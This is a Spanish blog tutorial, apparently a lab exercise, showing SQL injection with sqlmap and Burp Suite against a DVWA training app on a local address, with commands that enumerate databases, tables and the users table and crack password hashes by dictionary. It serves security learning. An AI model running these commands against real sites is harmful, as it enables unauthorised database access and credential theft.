viernes, 16 de septiembre de 2016

tutorial sqlmap

En esta ocasión, vamos a ver cómo se realiza una inyección SQL con sqlmap.

Para ello, abriremos nuestro amigo burpsuite.



En Iceweasel, abrirmos el open menu (las tres rayitas, una debajo de otra) → Preferences → Advanced → Network → Settings



Nuestra víctima está en la dirección 192.168.1.129, en el apartado de inyección de sql. Metemos el valor que queramos y le damos a “submit”



Si nos vamos a burpsuite obtenemos lo siguiente



Abrimos una terminal y ponemos

sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" --dbs














sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" -D dvwa –tables





sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" -D dvwa -T users --columns





sqlmap -u "http://192.168.1.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=b5c2eb7ae2bce65ef420e69b7582d5a5; security=low" -D dvwa -T users -c user --columns




Podemos elegir un diccionario o intro para el diccionario por defecto. Yo pulsé intro.









Publicado por en
Etiquetas: ,

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Suscribirse a: Enviar comentarios (Atom)